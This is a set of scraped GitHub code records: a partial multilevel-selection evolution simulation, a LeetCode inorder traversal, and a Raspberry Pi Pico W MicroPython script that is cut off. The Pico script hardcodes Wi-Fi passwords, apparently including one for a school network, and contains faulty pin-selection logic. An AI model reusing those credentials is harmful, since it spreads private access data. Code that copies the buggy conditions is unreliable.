int(model_par[\"init_groupNum\"])\n NType = int(model_par['indv_NType'])\n\n #get group reproduction traits\n offspr_size, offspr_frac = [float(model_par[x])\n for x in ('offspr_sizeInit', 'offspr_fracInit')]\n\n #check rates\n if offspr_size > 0.5:\n print('cannot do that: offspr_size < 0.5 and offspr_size < offspr_frac < 1')\n raise ValueError\n elif offspr_frac < offspr_size or offspr_frac > (1-offspr_size):\n print('cannot do that: offspr_frac should be offspr_size < offspr_frac < 1-offspr_size')\n raise ValueError\n\n #discretize traits\n offspr_size_idx = min(nBinOffsprSize, round(nBinOffsprSize * offspr_size / 0.5))\n offspr_frac_idx = min(nBinOffsprFrac, round(nBinOffsprFrac * offspr_frac / 1))\n \n offspr_frac_idx = offsprFracMatrix[offspr_frac_idx, offspr_size_idx]\n\n #create group composition vector\n nCoop = round(model_par[\"init_groupDens\"] * model_par['init_fCoop'] / model_par['indv_NType'])\n nDef = round(model_par[\"init_groupDens\"] * (1 - model_par['init_fCoop']) / model_par['indv_NType'])\n \n # init all groups with zero\n grpMat = np.zeros((NType * 2, sizeGroupMatInit, nBinOffsprFrac, nBinOffsprSize), order='C')\n grpMat2D = np.zeros((NType * 2, NGroup), order='C')\n\n # set group prop\n grpMat[0::2, 0:NGroup, offspr_frac_idx, offspr_size_idx] = nCoop\n grpMat[1::2, 0:NGroup, offspr_frac_idx, offspr_size_idx] = nDef\n grpMat2D[0::2, :] = nCoop\n grpMat2D[1::2, :] = nDef\n \n #create group LUT to connect 4D and 2D matrices\n grpLUT = np.full(sizeGroupMatInit, np.nan)\n grpLUT[0:NGroup] = np.arange(NGroup)\n\n return (grpMat, grpMat2D, grpLUT)\n\n\n\"\"\"============================================================================\nSample model code \n============================================================================\"\"\"\n@jit(Tuple((f8[:, ::1], f8, f8))(f8[:, :, :, ::1], f8[:]), nopython=True)\ndef summarize_grpMat(grpMat, grpLUT):\n #matrix with number per type\n #find existing groups and sum over all groups and cell types\n hasGrps = np.logical_not(np.isnan(grpLUT))\n traitDistr = grpMat[:,hasGrps,:,:].sum(axis=0).sum(axis=0) \n cellNumTot = traitDistr.sum()\n #calculate mean trait values using marginal distributions\n marginalSize = 
traitDistr.sum(axis=0) / cellNumTot\n marginalFrac = traitDistr.sum(axis=1) / cellNumTot\n av_size = np.sum(binCenterOffsprSize * marginalSize)\n av_frac = np.sum(binCenterOffsprFrac * marginalFrac)\n\n return (traitDistr, av_size, av_frac)\n\n# sample model\ndef sample_model(grpMatrix, grpMat2D, grpLUT, outputMat, traitDistr, \n sample_idx, currT, mavInt, rmsInt, stateVarPlus):\n # store time\n outputMat['time'][sample_idx] = currT\n\n # calc number of groups\n shapegrpMat = grpMat2D.shape\n NGroup = shapegrpMat[1]\n NType = int(shapegrpMat[0] / 2)\n\n # summarize groups\n traitDistrCurr, av_size, av_frac = summarize_grpMat(grpMatrix, grpLUT)\n\n # get group statistics\n NTot, NCoop, groupSizeAv, groupSizeMed, NTot_type, fCoop_group, grSizeVec = mls.calc_cell_stat(\n grpMat2D)\n\n # calc total population sizes\n for tt in range(NType):\n outputMat['N%i' %tt][sample_idx] = NTot_type[tt*2]\n outputMat['N%imut' %tt][sample_idx] = NTot_type[tt*2+1]\n \n outputMat['NTot'][sample_idx] = NTot\n outputMat['NCoop'][sample_idx] = NCoop\n outputMat['fCoop'][sample_idx] = NCoop / NTot\n \n outputMat['NGroup'][sample_idx] = NGroup\n outputMat['groupSizeAv'][sample_idx] = groupSizeAv\n outputMat['groupSizeMed'][sample_idx] = groupSizeMed\n\n outputMat['offspr_size'][sample_idx] = av_size\n outputMat['offspr_frac'][sample_idx] = av_frac\n\n #calc moving average \n if sample_idx >= 1:\n for varname in stateVarPlus:\n outname = varname + '_mav'\n mav, _ = util.calc_moving_av(\n outputMat[varname], sample_idx, mavInt)\n outputMat[outname][sample_idx] = mav\n\n # store distribution of traits\n traitDistr[sample_idx, :, :] = traitDistrCurr / NTot\n\n sample_idx += 1\n return sample_idx\n\n# sample model\ndef sample_nan(grpMatrix, outputMat, traitDistr, \n sample_idx, currT, mavInt, rmsInt, stateVarPlus):\n # store time\n outputMat['time'][sample_idx] = currT\n\n # calc total population sizes\n for varname in stateVarPlus:\n outname = varname + '_mav'\n outputMat[varname][sample_idx] = np.nan\n outputMat[outname][sample_idx] = np.nan\n\n traitDistr[sample_idx, :, :] = np.nan\n\n return None\n\n# sample model\ndef sample_extinction(outputMat, traitDistr, sample_idx, currT, stateVarPlus):\n # store time\n outputMat['time'][sample_idx] = currT\n\n # calc total population sizes\n for varname in stateVarPlus:\n outname = varname + '_mav'\n outputMat[varname][sample_idx] = 0\n outputMat[outname][sample_idx] = 0 \n\n # calc distribution groupsizes\n traitDistr[sample_idx, :, :] = 0\n sample_idx += 1\n\n return sample_idx\n\n\"\"\"============================================================================\nSub functions individual dynamics \n============================================================================\"\"\"\n# process individual level events\n@jit(i8(f8[:, :, :, ::1], f8[:, ::1], f8[::1], f8[::1], f8[::1], i8, i8, f8, f8, f8), nopython=True)\ndef process_indv_event(grpMat, grpMat2D, grpLUT, indvRate, rand, \n NType, NGroup, mutR_type, mutR_size, mutR_frac):\n # Note: grpMat and grpMat2D are updated in place, they don't have to be returned \n NTypeWMut = NType*2\n \n # select random event based on propensity\n eventID = util.select_random_event(indvRate, rand[0])\n # get event type\n eventType = math.floor(eventID / NGroup)\n # get event group\n grpIdx2D = eventID % NGroup # % is modulo operator\n typeIdx = eventType % NTypeWMut\n #find corresponding group in 4D array\n grpIdx4D = int(np.nonzero(grpLUT==grpIdx2D)[0].item())\n \n #find reproduction trait of affected cell\n fracIdx, sizeIdx = 
util.select_random_event_2D(grpMat[typeIdx, grpIdx4D, :, :], rand[1]) \n\n # track if any groups die in process\n groupDeathID = -1 # -1 is no death\n\n #process event \n if eventType < NTypeWMut: # birth event\n # check for mutation in cell type\n isWT = (typeIdx % 2) == 0 # Wild type cell\n typeMutates = rand[2] < mutR_type # mutates to other type\n offsprTypeIdx = typeIdx + 1 if (isWT and typeMutates) else typeIdx\n\n #check for mutation in offspring size\n if rand[3] < mutR_size / 2: # offspring size mutates to lower value\n offsprSizeIdx = max(0, sizeIdx - 1)\n elif rand[3] < mutR_size: # offspring size mutates to lower value\n offsprSizeIdx = min(nBinOffsprSize - 1, sizeIdx + 1)\n else:\n offsprSizeIdx = sizeIdx\n\n #check for mutation in offspring fraction\n if rand[4] < mutR_frac / 2: # offspring size mutates to lower value\n offsprFracIdx = max(0, fracIdx - 1)\n elif rand[4] < mutR_frac: # offspring size mutates to lower value\n offsprFracIdx = min(nBinOffsprFrac - 1, fracIdx + 1)\n else:\n offsprFracIdx = fracIdx\n\n #make sure we stay inside allowed trait space\n offsprFracIdx = offsprFracMatrix[offsprFracIdx, offsprSizeIdx]\n \n # place new offspring\n grpMat[offsprTypeIdx, grpIdx4D, offsprFracIdx, offsprSizeIdx] += 1\n grpMat2D[offsprTypeIdx, grpIdx2D] += 1\n\n else: # death event\n # remove cell from group\n if grpMat[typeIdx, grpIdx4D, fracIdx, sizeIdx]==0:\n raise NameError(\"no cell to kill\")\n grpMat[typeIdx, grpIdx4D, fracIdx, sizeIdx] -= 1\n grpMat2D[typeIdx, grpIdx2D] -= 1\n\n # kill group if last cell died\n # use two stage check for increased speed\n if grpMat2D[typeIdx, grpIdx2D] == 0: # killed last of type\n NINGroup = grpMat2D[:, grpIdx2D].sum()\n if NINGroup == 0: # all other types are zero too\n groupDeathID = int(grpIdx2D)\n\n return groupDeathID\n\n\n\"\"\"============================================================================\nSub functions migration dynamics \n============================================================================\"\"\"\n\n# process migration event\n@jit(i8(f8[:, :, :, ::1], f8[:, ::1], f8[::1], f8[::1], i8, i8, f8[::1]), nopython=True)\ndef process_migration_event(grpMat, grpMat2D, grpLUT, grSizeVec, NGroup, NType, rand):\n # Note: grpMat is updated in place, it does not need to be returned\n\n # select random group of origin based on size\n grpIDSource = util.select_random_event(grSizeVec, rand[0])\n #find corresponding group in 4D array\n grpIdSource4D = int(np.nonzero(grpLUT==grpIDSource)[0].item())\n\n # select random type of migrant based on population size\n typeIdx = util.select_random_event(grpMat2D[:, grpIDSource], rand[1])\n \n # find trait of affected cell\n fracIdx, sizeIdx = util.select_random_event_2D(grpMat[typeIdx, grpIDSource, :, :], rand[2])\n \n # select random target group\n grpIDTarget = int(np.floor(rand[3] * NGroup))\n #find corresponding group in 4D array\n grpIdTarget4D = np.nonzero(grpLUT==grpIDTarget)[0].item()\n\n #perform migration\n grpMat[typeIdx, grpIdSource4D, fracIdx, sizeIdx] -= 1\n grpMat[typeIdx, grpIdTarget4D, fracIdx, sizeIdx] += 1\n \n grpMat2D[typeIdx, grpIDSource] -= 1\n grpMat2D[typeIdx, grpIDTarget] += 1\n\n # track if any groups die in process\n groupDeathID = int(-1) # -1 is no death\n\n # kill group if last cell died\n # use two stage check for increased speed\n if grpMat2D[typeIdx, grpIDSource] == 0: # killed last of type\n NINGroup = grpMat2D[:, grpIDSource].sum()\n if NINGroup == 0: # all other types are zero too\n groupDeathID = int(grpIDSource)\n\n return 
groupDeathID\n\n\n\"\"\"============================================================================\nSub functions group dynamics \n============================================================================\"\"\"\n\n# remove group from group matrix\n@jit(f8[:, ::1](f8[:, :, :, ::1], f8[:, ::1], f8[:], i8), nopython=True)\ndef remove_group(grpMat, grpMat2D, grpLUT, groupDeathID):\n #grpMat and grpLUT modified in place\n #first remove group from 4D matrix by setting its index to -1\n #find corresponding group in 4D array\n grpIdTarget4D = int(np.nonzero(grpLUT==groupDeathID)[0].item())\n #for safety set group traits to zero (should not be needed, remove for speed)\n grpLUT[grpIdTarget4D] = np.nan\n grpMat[:, grpIdTarget4D, :, :] = 0\n \n #now remove group from 2D matrix\n NGrp = grpMat2D.shape[1]\n hasDied = np.zeros(NGrp)\n hasDied[groupDeathID] = 1\n # copy remaining groups to new matrix\n grpMat2DNew = grpMat2D[:, hasDied == 0]\n grpMat2DNew = grpMat2DNew.copy()\n \n #update grpLUT to reflect changed positions\n grpLUT[grpLUT > groupDeathID] -= 1\n \n return grpMat2DNew\n\n@jit(Tuple((f8, f8, f8))(f8[:, :, ::1]), nopython=True, debug=True)\ndef calc_mean_group_prop(parentGroup):\n #parent group: type / frac / size \n #sum over all cell types \n parTraitMatrix = parentGroup.sum(axis=0)\n #number of cells in parents\n NCellPar = parTraitMatrix.sum()\n\n #calculate average trait values using marginal distributions \n marginalSize = parTraitMatrix.sum(axis=0) / NCellPar\n marginalFrac = parTraitMatrix.sum(axis=1) / NCellPar\n offspr_size = np.sum(binCenterOffsprSize * marginalSize)\n offspr_frac = np.sum(binCenterOffsprFrac * marginalFrac)\n return(offspr_size, offspr_frac, NCellPar)\n\n\n@jit(Tuple((f8[:, :, :, ::1], f8[:, ::1], f8[::1]))(f8[:, :, :, ::1], f8[:, ::1], f8[::1], i8), nopython=True)\ndef fission_group(grpMat, grpMat2D, grpLUT, eventGroup): \n #find corresponding group in 4D array\n grpIdx4D = int(np.nonzero(grpLUT==eventGroup)[0].item())\n \n #get parent group\n parentGroup = grpMat[:, grpIdx4D, :, :].copy()\n #get group properties\n offspr_size, offspr_frac, NCellPar = calc_mean_group_prop(parentGroup)\n NCellPar = int(parentGroup.sum())\n \n #distribute cells \n destinationIdx, nOffspring = mls.distribute_offspring(offspr_size, \n offspr_frac, \n NCellPar)\n \n if nOffspring > 0: \n if np.sum(destinationIdx==-1) > 0:\n #consider parent to be new group, remove old parent\n destinationIdx += 1\n nPar = 1\n else:\n nPar = 0\n \n #remove parent from 4D matrice (copy stored in parentGroup)\n grpLUT[grpIdx4D] = np.nan\n grpMat[:, grpIdx4D, :, :] = 0\n \n #find empty spots for new groups\n emptyPlaces = np.nonzero(np.isnan(grpLUT))[0] \n #check if there are enough empty sites, if not grow matrix\n if nOffspring > emptyPlaces.size - 1:\n grpMat, grpLUT = expand_grpMat(grpMat, grpLUT)\n emptyPlaces = np.nonzero(np.isnan(grpLUT))[0] \n \n #init new 2D array \n matShape2D = grpMat2D.shape\n nGrpAdded = nOffspring + nPar\n nGrpNew = matShape2D[1] + nGrpAdded - 1\n grpMat2DNew = np.zeros((matShape2D[0], nGrpNew))\n isParent = np.zeros(matShape2D[1])\n isParent[eventGroup] = 1\n \n #store existing groups at end, exclude parent \n grpMat2DNew[:, nGrpAdded::] = grpMat2D[:, isParent==0]\n grpMat2DNew = grpMat2DNew.copy()\n \n #update grpLUT to reflect new positions\n grpLUT[grpLUT > eventGroup] += (nGrpAdded - 1)\n grpLUT[grpLUT < eventGroup] += nGrpAdded\n grpLUT[emptyPlaces[0:nGrpAdded]] = np.arange(nGrpAdded)\n \n #find non zero elements\n ttIDx, ffIdx, ssIdx = np.nonzero(parentGroup)\n 
#loop all cells in parentgroup and assign to new group\n idx = 0\n for ii in range(ttIDx.size):\n numCell = parentGroup[ttIDx[ii], ffIdx[ii], ssIdx[ii]]\n while numCell>0:\n currDest = destinationIdx[idx]\n currDest4D = emptyPlaces[currDest]\n grpMat[ttIDx[ii],\n currDest4D,\n ffIdx[ii],\n ssIdx[ii]] += 1\n \n grpMat2DNew[ttIDx[ii],\n currDest] += 1\n numCell -= 1\n idx += 1 \n \n else:\n #nothing happens\n grpMat2DNew = grpMat2D\n \n return (grpMat, grpMat2DNew, grpLUT)\n\n# process individual level events\n@jit(Tuple((f8[:, :, :, ::1], f8[:, ::1], f8[::1]))(f8[:, :, :, ::1], f8[:, ::1], f8[::1], f8[::1], f8[::1]), nopython=True)\ndef process_group_event(grpMat, grpMat2D, grpLUT, grpRate, rand):\n # get number of groups\n NGroup = grpMat2D.shape[1]\n\n # select random event based on propensity\n eventID = util.select_random_event(grpRate, rand[0])\n # get event type\n eventType = math.floor(eventID/NGroup)\n # get event group\n eventGroup = eventID % NGroup # % is modulo operator\n \n if eventType < 1:\n # fission event - add new group and split cells\n grpMat, grpMat2D, grpLUT = fission_group(grpMat, grpMat2D, grpLUT, eventGroup)\n else:\n # extinction event - remove group\n grpMat2D = remove_group(grpMat, grpMat2D, grpLUT, eventGroup)\n return (grpMat, grpMat2D, grpLUT)\n\n\n#calc group properties\n# calc total number of individuals per group, use matrix product for speed\n@jit(Tuple((f8[:, ::1], f8[::1], f8))(f8[:, :, :, ::1], f8[::1], f8[::1]), nopython=True)\ndef calc_group_state(grpMat, onesNType, onesNGrp):\n #matrix with number per type\n grpMat2D = grpMat.sum(axis=3).sum(axis=2)\n #vector with size of each group\n grSizeVec = onesNType @ grpMat2D\n #float total number of individuals\n NTot = onesNGrp @ grSizeVec\n\n return(grpMat2D, grSizeVec, NTot)\n\n\n\n\"\"\"============================================================================\nMain model code\n============================================================================\"\"\"\n\n# main model\ndef run_model(model_par):\n \n #create state variables\n stateVarPlus = stateVar + \\\n ['N%i' % x for x in range(model_par['indv_NType'])] + \\\n ['N%imut' % x for x in range(model_par['indv_NType'])]\n \n # get individual rates\n delta_indv = float(model_par['delta_indv'])\n indv_K = float(model_par['indv_K'])\n inv_migrR = float(model_par['indv_migrR'])\n NType = int(model_par['indv_NType'])\n mutR_type = float(model_par['mutR_type'])\n mutR_size = float(model_par['mutR_size'])\n mutR_frac = float(model_par['mutR_frac'])\n # get group rates\n gr_CFis = float(model_par['gr_CFis'])\n gr_SFis = float(model_par['gr_SFis']) / indv_K\n K_grp = float(model_par['K_grp'])\n K_tot = float(model_par['K_tot'])\n delta_grp = float(model_par['delta_grp'])\n delta_tot = float(model_par['delta_tot'])\n delta_size = float(model_par['delta_size'])\n indv_tau = float(model_par['indv_tau'])\n\n # Initialize model, get rates and init matrices\n maxT, minT, sampleInt, mavInt, rmsInt = mls.calc_time_steps(model_par)\n \n # init counters\n currT = 0\n ttR = 0\n sampleIdx = 0\n \n # get matrix with random numbers\n rndSize1 = 7\n rndSize0 = int(1E6)\n randMat = util.create_randMat(rndSize0, rndSize1)\n \n # initialize outputMat matrix\n outputMat, traitDistr = init_outputMat_matrix(model_par)\n\n #init static helper vectors\n onesNType, birthRVec, deathR = mls.adjust_indv_rates(model_par)\n \n # initialize group matrix\n grpMat, grpMat2D, grpLUT = init_grpMat(model_par)\n NGroup = grpMat2D.shape[1]\n\n #init dynamic helper vectors\n onesNGrp, onesIndR, 
onesGrR, indvRate, grpRate = mls.create_helper_vector(\n NGroup, NType)\n\n # get first sample of init state\n sampleIdx = sample_model(grpMat, grpMat2D, grpLUT, \n outputMat, traitDistr, \n sampleIdx, currT, mavInt, rmsInt, \n stateVarPlus)\n\n # loop time steps\n while currT <= maxT:\n # reset rand matrix when used up\n if ttR >= rndSize0:\n randMat = util.create_randMat(rndSize0, rndSize1)\n ttR = 0 \n\n #calc group state\n grSizeVec, NTot = mls.calc_group_state(grpMat2D, \n onesNType, onesNGrp) \n\n # calc rates of individual level events\n mls.calc_indv_rates(indvRate, grpMat2D, grSizeVec, birthRVec,\n deathR, delta_indv, NType, NGroup)\n \n \n # calc rates of group events\n mls.calc_group_rates(grpRate, grpMat2D, grSizeVec, NTot, NGroup,\n gr_CFis, gr_SFis, K_grp, K_tot,\n delta_grp, delta_tot, delta_size)\n\n # calculate total propensities\n indvProp = indv_tau * (onesIndR @ indvRate)\n grpProp = onesGrR @ grpRate\n migrProp = inv_migrR * NTot\n totProp = indvProp + grpProp + migrProp\n\n # calc time step\n dt = -1 * math.log(randMat[ttR, 1]) / totProp\n\n # select group or individual event\n rescaledRand = randMat[ttR, 0] * totProp\n groupsHaveChanged = False\n if rescaledRand < indvProp:\n # individual level event - select and process individual level event\n groupDeathID = process_indv_event(grpMat, grpMat2D, grpLUT, indvRate, \n randMat[ttR, 2:7], NType, NGroup, \n mutR_type, mutR_size, mutR_frac)\n if groupDeathID > -1: # remove empty group\n grpMat2D = remove_group(grpMat, grpMat2D, grpLUT, groupDeathID)\n groupsHaveChanged = True\n elif rescaledRand < (indvProp + migrProp):\n # migration event - select and process migration event\n groupDeathID = process_migration_event(grpMat, grpMat2D, grpLUT, grSizeVec, \n NGroup, NType, randMat[ttR, 2:6])\n if groupDeathID > -1: # remove empty group\n grpMat2D = remove_group(grpMat, grpMat2D, grpLUT, groupDeathID)\n groupsHaveChanged = True\n else:\n # group level event - select and process group level event\n grpMat, grpMat2D, grpLUT= process_group_event(grpMat, grpMat2D, grpLUT, grpRate, randMat[ttR, 2:4])\n groupsHaveChanged = True\n \n # update group matrices if needed \n if groupsHaveChanged:\n NGroup = grpMat2D.shape[1]\n if NGroup > 0: #update group matrices\n onesNGrp, onesIndR, onesGrR, indvRate, grpRate = mls.create_helper_vector(\n NGroup, NType) \n else: #otherwise, if all groups have died, end simulation\n sampleIdx = sample_extinction(outputMat, traitDistr, sampleIdx, currT, stateVarPlus)\n print('System has gone extinct')\n break\n\n # update time\n currT += dt\n ttR += 1\n # sample model at intervals\n nextSampleT = sampleInt * sampleIdx\n if currT >= nextSampleT:\n sampleIdx = sample_model(grpMat, grpMat2D, grpLUT, \n outputMat, traitDistr, \n sampleIdx, currT, mavInt, rmsInt, \n stateVarPlus)\n \n # cut off non existing time points at end\n outputMat = outputMat[0:sampleIdx]\n traitDistr = traitDistr[0:sampleIdx, :, :]\n \n if outputMat['NCoop'][-1] == 0:\n outputMat['NCoop_mav'][-1] = 0\n \n return (outputMat, traitDistr)\n\n\n\"\"\"============================================================================\nCode that calls model and plots results\n============================================================================\"\"\"\n\ndef single_run_save(model_par, mainName):\n \"\"\"[Runs evolution model and saves results to disk in .npz file]\n \n Arguments:\n model_par {[dictionary]} -- [model parameters] \n \n mainName {[string]} -- [filename for data file, appended with parameter settings]\n Returns:\n [numpy 2D 
array] -- [trait distribution at last timepoint]\n \"\"\"\n #create file name, append mainName with parameter settings\n parNameAbbrev = {\n 'delta_indv' : 'dInd',\n 'delta_grp' : 'dGrp',\n 'delta_tot' : 'dTot',\n 'delta_size' : 'dSiz',\n 'gr_CFis' : 'fisC',\n 'gr_SFis' : 'fisS',\n 'alpha_Fis' : 'fisA',\n 'indv_NType' : 'nTyp', \n 'indv_asymmetry': 'asym',\n 'indv_cost' : 'cost', \n 'mutR_type' : 'muTy', \n 'mutR_size' : 'muSi', \n 'mutR_frac' : 'muFr', \n 'indv_migrR' : 'migR', \n 'indv_K' : 'kInd', \n 'K_grp' : 'kGrp', \n 'K_tot' : 'kTot',\n 'offspr_sizeInit':'siIn',\n 'offspr_fracInit':'frIn',\n 'indv_tau' : 'tInd'}\n \n parListName = ['gr_SFis', 'indv_cost', 'mutR_type',\n 'mutR_size', 'mutR_frac', 'offspr_sizeInit',\n 'offspr_fracInit', 'indv_K',\n 'indv_migrR','indv_tau']\n parName = ['_%s%.0g' %(parNameAbbrev[x], model_par[x]) for x in parListName]\n parName = ''.join(parName)\n fileName = mainName + parName + '.npz'\n \n #run model and save data to disk\n try: \n outputMat, traitDistr = run_model(model_par) \n np.savez(fileName, output=outputMat, traitDistr=traitDistr,\n model_par=[model_par])\n except:\n print(\"error with run\")\n traitDistr = np.full((1, nBinOffsprFrac, nBinOffsprSize), np.nan)\n \n return traitDistr\n \n\n# this piece of code is run only when this script is executed as the main\nif __name__ == \"__main__\":\n print(\"running with default parameter\")\n\n model_par = {\n #time and run settings\n \"maxT\": 30, # total run time\n \"maxPopSize\": 0, #stop simulation if population exceeds this number\n \"minT\": 10, # min run time\n \"sampleInt\": 1, # sampling interval\n \"mav_window\": 5, # average over this time window\n \"rms_window\": 5, # calc rms change over this time window\n \"rms_err_trNCoop\": 0, # when to stop calculations\n \"rms_err_trNGr\": 0, # when to stop calculations\n # settings for initial condition\n \"init_groupNum\": 300, # initial # groups\n \"init_fCoop\": 1,\n \"init_groupDens\": 20, # initial total cell number in group\n # settings for individual level dynamics\n # complexity\n \"indv_NType\": 2,\n \"indv_asymmetry\": 1, # difference in growth rate b(j+1) = b(j) / asymmetry\n # mutation load\n \"indv_cost\": 0.01, # cost of cooperation\n \"indv_migrR\": 0, # mutation rate to cheaters\n # set mutation rates\n 'mutR_type': 1E-3,\n 'mutR_size': 2E-2, \n 'mutR_frac': 2E-2, \n # group size control\n \"indv_K\": 100, # total group size at EQ if f_coop=1\n \"delta_indv\": 1, # zero if death rate is simply 1/k, one if death rate decreases with group size\n # setting for group rates\n # fission rate\n 'gr_CFis': 1/100,\n 'gr_SFis': 4,\n 'indv_tau': 0.1,\n # extinction rate\n 'delta_grp': 0, # exponent of denisty dependence on group #\n 'K_grp': 0, # carrying capacity of groups\n 'delta_tot': 1, # exponent of denisty dependence on total #indvidual\n 'K_tot': 5000, # carrying capacity of total individuals\n 'delta_size': 0, # exponent of size dependence\n # initial settings for fissioning\n 'offspr_sizeInit': 0.05, # offspr_size <= 0.5 and\n 'offspr_fracInit': 0.9 # offspr_size < offspr_frac < 1-offspr_size'\n }\n \n start = time.time()\n outputMat, traitDistr = run_model(model_par) \n end = time.time()\n print(end - start)\n print('done')\n","repo_name":"simonvanvliet/MLS_FragmentationModes","sub_path":"python_model_code/mainCode/MlsGroupDynamics_evolve.py","file_name":"MlsGroupDynamics_evolve.py","file_ext":"py","file_size_in_byte":31463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} 
+{"seq_id":"6355571043","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\"\"\"\nGiven a binary tree, return the inorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n 1\n \\\n 2\n /\n 3\nreturn [1,3,2].\n\nNote: Recursive solution is trivial, could you do it iteratively?\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.\n\n\"\"\"\n\nclass Solution(object):\n def inorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n r_list = []\n if root is None:\n return r_list\n \n node_stack = [root.right, root, root.left]\n label_stack = [False, True, False]\n while len(node_stack)>=1:\n node = node_stack.pop()\n label = label_stack.pop()\n if node is None:\n continue\n \n if label:\n r_list.append(node.val)\n else:\n node_stack.append(node.right)\n node_stack.append(node)\n node_stack.append(node.left)\n label_stack.append(False)\n label_stack.append(True)\n label_stack.append(False)\n return r_list\n \n ","repo_name":"mountlovestudy/leetcode","sub_path":"BinaryTreeInorderTraversal.py","file_name":"BinaryTreeInorderTraversal.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9003117388","text":"import usocket as socket\nimport machine\nfrom machine import Pin, ADC, PWM\nimport uasyncio as aio\nimport network\nimport os\nimport sys\nimport time\n\nIP = \"192.168.1.241\"\nPORT = \"19\"\nSSID = \"Da Snifs\"\nPASSWORD = \"11111111\"\n\nNAME = \"Raspberry Pi Pico\"\n\n# IP = \"10.3.5.60\"\n# PORT = \"19\"\n# SSID = \"LVISD Student\"\n# PASSWORD = \"!V1k1ng$R0w1ng!\"\n\n# Use big encoding to get a unique ID for the Pico\nUID = int.from_bytes(machine.unique_id(), \"big\")\nprint(NAME)\nprint(UID)\n\nBUFFSIZE = 4096\n\nRUN = True\n\noutput = None\n\nprocessFunc = None\n\nif IP == \"\" or PORT == \"\":\n selfNet = network.WLAN(network.AP_IF)\n selfNet.config(ssid=NAME, security=0, txpower=-60)\n selfNet.active(True)\n print(selfNet.ifconfig())\n site = usocket.socket(usocket.AF_INET, usocket.SOCK_STREAM)\n site.setsockopt(usocket.SOL_SOCKET, usocket.SO_REUSEADDR, 1)\n site.bind(('', 80))\n site.listen(5)\n\n html = \"\"\"\n\n \n \n Setup\n \n \n \n

Welcome to Javascape!

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n \n
\n \n \n\n\"\"\"\n while True:\n conn, addr = site.accept()\n\n conn.sendall(html)\n\n # print('Got a connection from %s' % str(addr))\n request = conn.recv(1024)\n request = str(request)\n # print('Content = %s' % request)\n\n argsIndex = request.find(\"/?\") + 2\n argsEndIndex = request.find(\"HTTP\") - 1\n request = request[argsIndex:argsEndIndex]\n requestargs = request.split(\"&\")\n print(requestargs)\n if (len(requestargs) == 5) and requestargs[0][3:] != \"\" and requestargs[1][5:] != \"\" and requestargs[2][5:] != \"\" and requestargs[3][9:] != \"\" and requestargs[4][3:] != \"\":\n response = \"Thank You!\"\n conn.sendall(response)\n conn.close()\n site.close()\n break\n\nwirelessNet = network.WLAN(network.STA_IF)\nwirelessNet.active(True)\nwirelessNet.connect(SSID, PASSWORD)\n\n#time.sleep(1)\n\nif not wirelessNet.isconnected():\n print(\"No connection\")\n\npins = []\nfor i in range(29):\n if i is not 23 or i is not 24 or i is not 25:\n if i is 26 or i is 27 or i is 28:\n pins.append(ADC(Pin(i)))\n else:\n pins.append(Pin(int(i), Pin.OUT, value=0))\n else:\n pins.append(Pin())\n\n# TODO: Check if socket is still active, if not, then close the socket and restart the connection\n\n\ndef process(data):\n if len(data) == 0:\n print(\"No data\")\n return\n print(data)\n args = data.split(\" \")\n\n if args[0] == \"getInfo\":\n return \"type 2 \" + str(UID) + \" Pico_W\"\n\n elif args[0] == \"set\":\n if (args[1] == \"LED\"):\n Pin(\"LED\", Pin.OUT, value=int(args[2]))\n return \"Set LED to \" + args[2]\n else:\n Pin(int(args[1]), Pin.OUT, value=int(args[2]))\n return \"Set pin \" + args[1] + \" to \" + args[2]\n elif args[0] == \"setAnalog\":\n pins[int(args[1])] = ADC(Pin(int(args[1])))\n elif args[0] == \"getAllAnalog\":\n n = \"analogValues\"\n\n n = n + \" 26:\" + str(pins[26].read_u16())\n n = n + \" 27:\" + str(pins[27].read_u16())\n n = n + \" 28:\" + str(pins[28].read_u16())\n print(n)\n\n elif args[0] == \"get\":\n if (args[1] == \"LED\"):\n return Pin(\"LED\").value\n else:\n return Pin(int(args[1])).value\n\n elif args[0] == \"setAll\":\n for i in range(int(args[1])):\n n = args[2+i].split(\":\")\n if i is not 23 or i is not 24 or i is not 25:\n if n[0] == \"0\":\n pins.append(Pin(\n int(i), Pin.OUT, value=int(n[1])))\n elif n[0] == \"1\":\n pins.append(Pin(int(i), Pin.IN))\n elif n[0] == \"2\":\n pins.append(ADC(Pin(int(args[1]))))\n else:\n pins.append(Pin())\n return \"finished setAll\"\n elif args[0] == \"getAll\":\n n = \"\"\n for i in range(len(pins)):\n n = n + str(pins[i].value())\n print(n)\n return \"Unrecognized command\"\n\n# The main thread\n\n\nasync def run():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # sock = socket.socket()\n\n def close():\n machine.Pin(\"LED\", machine.Pin.OUT, value=0)\n print(\"Socket closed\")\n\n # Attempt a connection to the server\n try:\n print(\"Connecting to \" + IP + \":\" + PORT)\n server = socket.getaddrinfo(IP, int(PORT))[0][-1]\n sock.connect(server)\n print(\"Connected\")\n except OSError as e:\n print(\"Socket error: \" + str(e))\n sock.close()\n return\n\n while True:\n sreader = aio.StreamReader(sock)\n swriter = aio.StreamWriter(sock, {})\n\n while True:\n try:\n input = (await sreader.readline())[:-2]\n input = input.decode(\"utf-8\")\n output = process(input) + \" \\n\"\n print(\"Sending: \" + output[:-2])\n # sock.sendall(bytes(output, \"utf-8\"))\n swriter.write(output.encode(\"utf-8\"))\n await swriter.drain()\n print(\"Sent\")\n if len(pins) >= 26:\n print(pins[26].read_u16())\n\n except 
